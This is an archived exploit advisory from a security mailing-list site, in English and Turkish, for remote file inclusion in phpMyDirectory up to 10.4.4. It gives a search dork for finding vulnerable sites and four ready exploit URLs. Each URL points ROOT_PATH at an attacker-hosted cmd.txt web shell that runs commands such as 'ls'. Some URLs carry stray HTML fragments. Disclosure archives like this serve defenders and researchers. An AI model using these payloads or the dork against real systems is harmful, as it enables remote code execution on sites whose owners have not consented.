Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA20165] FrontRange iHEAT Host System Access Vulnerability

  OpenCms version 6.0.x Xml Content Demo search engine Cross site scripting

  Diesel Joke Site SQL INJECTION

  YLZH(right.
php)Cross Site Scripting

From:ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:25.05.2006
Subject:phpMyDirectory <= 10.4.4 Multiple Remote File Include(new!)

ENGLISH

# Title  :   phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities

# Dork   :   "powered by phpmydirectory"

# Author :   ajann

# greetz :   Nukedx,TheHacker

# Exploit;

###  http://[target]/[path]/template/default/footer.php?ROOT_PATH=class="fixed">http://yourhost.com/cmd.txt?cmd=ls

###  http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=class="fixed">http://yourhost.com/cmd.txt?cmd=ls

###  http://[target]/[path]/defaults_setup.php?ROOT_PATH=class="fixed">http://yourhost.com/cmd.txt?cmd=ls

### SOME;
http://[target]/[path]/template/default/test/header.php?ROOT_PATH=class="fixed">http://yourhost.com/cmd.txt?cmd=ls

# ajann,Turkey


TURKISH

# Başlık          :   phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities
# Sözcük[Arama]   :   "powered by phpmydirectory"
# Açığı Bulan     :   ajann
# greetz          :   Nukedx,TheHacker
# Açık bulunan dosyalar;

###  http://[target]/[path]/template/default/footer.php?ROOT_PATH=class="fixed">http://yourhost.com/cmd.txt?cmd=ls
###  http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=class="fixed">http://yourhost.com/cmd.txt?cmd=ls
###  http://[target]/[path]/defaults_setup.php?ROOT_PATH=class="fixed">http://yourhost.com/cmd.txt?cmd=ls
### SOME;
http://[target]/[path]/template/default/test/header.php?ROOT_PATH=class="fixed">http://yourhost.com/cmd.txt?cmd=ls

Açıklama:
Temalarda bulunan footer.php dosyası güvenlik açığına yol açmaktadır.Bu sayede
uzaktan kod çalıştırılabilir.
defaults_setup.php kurulumdan sonra silinmemişse aynı açık uygulanabilmektedir.
test/header.php bölümü ise bazen denk gelmektedir,aynı açık bulunmaktadır.
Açık 10.4.4 dahil alt sürümlerinde çalışmaktadır.

Thanks.

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod
 



Rating@Mail.ru